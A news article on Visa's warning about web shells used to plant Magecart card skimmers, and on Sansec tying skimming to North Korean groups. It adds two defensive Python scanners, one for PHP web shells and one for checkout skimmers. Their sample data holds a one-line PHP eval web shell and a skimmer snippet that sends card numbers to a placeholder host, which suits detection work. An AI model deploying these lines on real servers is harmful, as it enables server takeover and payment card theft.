
Visa: Hackers Use Web Shells to Compromise Servers and Steal Credit Card Details

Visa, the global payment processor, has warned that attackers are increasingly deploying web shells on compromised servers to steal credit card information from online customers. Web shells are tools (scripts or programs) that attackers upload to a compromised server in order to keep their access, remotely execute arbitrary commands or code, move quietly through the victim's network, or drop additional malicious payloads. Since last year, Visa has seen more web shells being used to deploy JavaScript-based credit card skimmers on breached online platforms in digital skimming attacks (also known as web skimming, e-skimming, or Magecart attacks).

If successful, the skimmers let the attackers exfiltrate payment information and personal data submitted by the breached platform's customers and transfer it to servers under their control. According to Visa, "throughout 2020, Visa Payment Fraud Disruption (PFD) identified a trend whereby many e-skimming attacks used web shells to establish a command and control (C2) during the attacks. PFD confirmed at least 45 e-skimming attacks in 2020 using web shells, and security researchers similarly noted increasing web shell use across the wider information security threat landscape."

According to Visa PFD's findings, most Magecart actors used web shells to plant backdoors on compromised online store servers and to build command and control (C2) infrastructure through which the stolen card data is collected. The attackers used various approaches to break into the shops' servers: exploiting vulnerabilities in insecure administrative infrastructure, in e-commerce apps and website plugins, and in unpatched or out-of-date e-commerce platforms. Visa's findings match what the Microsoft Defender Advanced Threat Protection (ATP) team reported earlier this February: the number of web shells implanted on compromised servers has nearly doubled since last year.

"The company's security researchers discovered an average of 140,000 such malicious tools on hacked servers every month between August 2020 and January 2021," reports Bleeping Computer. "In comparison, Microsoft said in a 2020 report that it detected an average of 77,000 web shells each month, based on data collected from roughly 46,000 distinct devices between July and December 2019," it adds.
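As an added example (not from the article, Visa or Microsoft), the following Python script shows how a defender might triage PHP files on a web server for common web shell indicators: command execution functions, eval, decode-and-run chains, and request parameters flowing straight into an execution sink. The rule set, the weights and the sample files are all constructed for illustration and would need tuning against a baseline of the site's own code.

```python
import re
from dataclasses import dataclass

# Illustrative indicator rules for PHP web shells (constructed for this example,
# not a vendor signature set). Each rule is a compiled regex over file contents.
RULES = {
    "exec_function": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "eval_call": re.compile(r"\b(eval|assert)\s*\(", re.I),
    "decode_chain": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Request data reaching an execution sink in the same statement is the strongest signal.
    "request_to_sink": re.compile(
        r"\b(system|exec|shell_exec|passthru|eval|assert)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    "long_encoded_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}
# Weights are illustrative; a legitimate image tool that shells out once should stay below threshold.
WEIGHTS = {"exec_function": 2, "eval_call": 2, "decode_chain": 2, "request_to_sink": 5, "long_encoded_blob": 3}


@dataclass
class Finding:
    path: str
    score: int
    hits: dict  # rule name -> number of matches


def scan_source(path: str, source: str) -> Finding:
    """Score one file's contents against RULES. Repeated hits of a rule are capped
    so a large benign library does not outscore a one-line shell."""
    hits = {name: len(rx.findall(source)) for name, rx in RULES.items()}
    hits = {k: v for k, v in hits.items() if v}
    score = sum(WEIGHTS[k] * min(v, 3) for k, v in hits.items())
    return Finding(path, score, hits)


def triage(files: dict, threshold: int = 5) -> list:
    """files maps path -> source text. Returns findings at or above threshold, highest first."""
    findings = (scan_source(p, s) for p, s in files.items())
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample files: a legitimate helper, a legitimate script that shells out once,
# and a one-line web shell of the kind the article describes (hidden in a cache directory).
SAMPLE_FILES = {
    "includes/cache.php": "<?php\nfunction cache_get($k) { return apcu_fetch($k); }\n",
    "tools/thumbs.php": "<?php\n$out = shell_exec('convert in.png -resize 120x120 out.png');\n",
    "media/cache/.tmp.php": "<?php @eval(base64_decode($_POST['p']));\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_FILES):
        print(f"{f.path}: score={f.score} hits={f.hits}")
```

In practice the `files` mapping would be built by walking the web root, and the highest-value follow-up on any hit is a file-integrity comparison against the deployed release, since a web shell is by definition a file the release did not ship.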

Hackers Attack Online Stores Stealing Credit Card Data, Experts Allege North Korea


According to recent findings, European and American online stores have been hit by a series of web skimming attacks, and the group responsible is most likely state-sponsored and based in North Korea. Research by the security firm Sansec shows that the web skimming attacks on these online retail stores began in May 2019 and attributes them to the Lazarus and Hidden Cobra APT groups, which planted payment skimmers on the breached stores.



According to the new research, the attackers have since expanded their operation: they target a larger set of online stores and use a skimming script that steals the customer's banking credentials during the checkout stage. Sansec attributes the attacks to Hidden Cobra because the pattern matches the group's previous campaigns.

What is a Magecart attack?
Magecart is a web skimming attack in which attackers steal a user's banking credentials and credit card details. In this incident, Hidden Cobra, after gaining access, launched a large-scale attack on big online retail stores. Once the attackers have unauthorized access, they deploy malicious scripts on the websites' checkout pages. The skimmer captures everything the user types during checkout and sends it to Hidden Cobra's servers. According to Sansec's data, of the millions of online stores, up to 100 are compromised on average every day.

"To monetize the skimming operations, HIDDEN COBRA developed a global exfiltration network. This network utilizes legitimate sites that were hijacked and repurposed to serve as disguises for criminal activity. The system is also used to funnel the stolen assets so that they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, including a modeling agency from Milan, a vintage music store from Tehran, and a family-run book store from New Jersey," says the Sansec report. Experts have now linked various attacks since 2019 to Hidden Cobra and say the threat actors are very likely state-sponsored.
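The checkout-page injection and the exfiltration network described above can both be checked from the defender's side. The following Python script is an added example, not Sansec's code or anything from its report: it parses a checkout page, flags script sources whose host is not on the shop's allowlist, flags inline scripts that both read payment fields and have a way to send data off the page, and emits a Content-Security-Policy that confines script loading and outbound connections to that allowlist (which is what blocks exfiltration to a hijacked third-party site the shop never intended to talk to). The sample page, the hosts and the heuristics are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


# Constructed heuristics: inline code that touches payment fields and also has a way
# to send data off the page deserves a human look.
PAYMENT_FIELD = re.compile(r"card[_-]?number|ccnum|cvv|cvc|expir", re.I)
NETWORK_SINK = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)


def audit_checkout_page(html: str, page_host: str, allowed_hosts: set) -> list:
    """Return (kind, detail) findings for scripts that fall outside the allowlist."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        u = urlparse(src)
        host = u.netloc.lower()
        if not host:  # relative URL, same origin
            continue
        if host != page_host and host not in allowed_hosts:
            findings.append(("unexpected_script_host", src))
        elif u.scheme and u.scheme != "https":
            findings.append(("insecure_scheme", src))
    for body in p.inline:
        if PAYMENT_FIELD.search(body) and NETWORK_SINK.search(body):
            findings.append(("inline_payment_fields_with_network_sink", body.strip()[:60]))
    return findings


def csp_header(allowed_hosts: set) -> str:
    """A Content-Security-Policy value confining script loading and outbound connections
    to the shop's own origin plus the allowlisted hosts."""
    hosts = " ".join(sorted(allowed_hosts))
    return (f"script-src 'self' {hosts}; connect-src 'self' {hosts}; "
            "img-src 'self' data:; form-action 'self'; object-src 'none'; base-uri 'self'")


# Constructed checkout page: one same-origin script, one allowlisted payment script,
# one script from an unexpected host, and an inline snippet with the skimmer-like shape.
SAMPLE_HTML = """<html><body>
<form id="checkout">
  <input id="cardnumber" name="cardnumber">
  <input id="cvv" name="cvv">
</form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example/pay.js"></script>
<script src="https://static.hijacked-shop.invalid/jquery.min.js"></script>
<script>
  var d = document.getElementById('cardnumber').value;
  fetch('https://static.hijacked-shop.invalid/c', {method: 'POST', body: d});
</script>
<script>console.log('analytics ready');</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_HTML, "shop.example", {"cdn.example"}):
        print(f"{kind}: {detail}")
    print("Content-Security-Policy:", csp_header({"cdn.example"}))
```

Running the audit on every release, and on a scheduled fetch of the live checkout page, catches the case the article describes: a script the deployment never shipped appearing on the page, or an existing script starting to contact a host nobody approved.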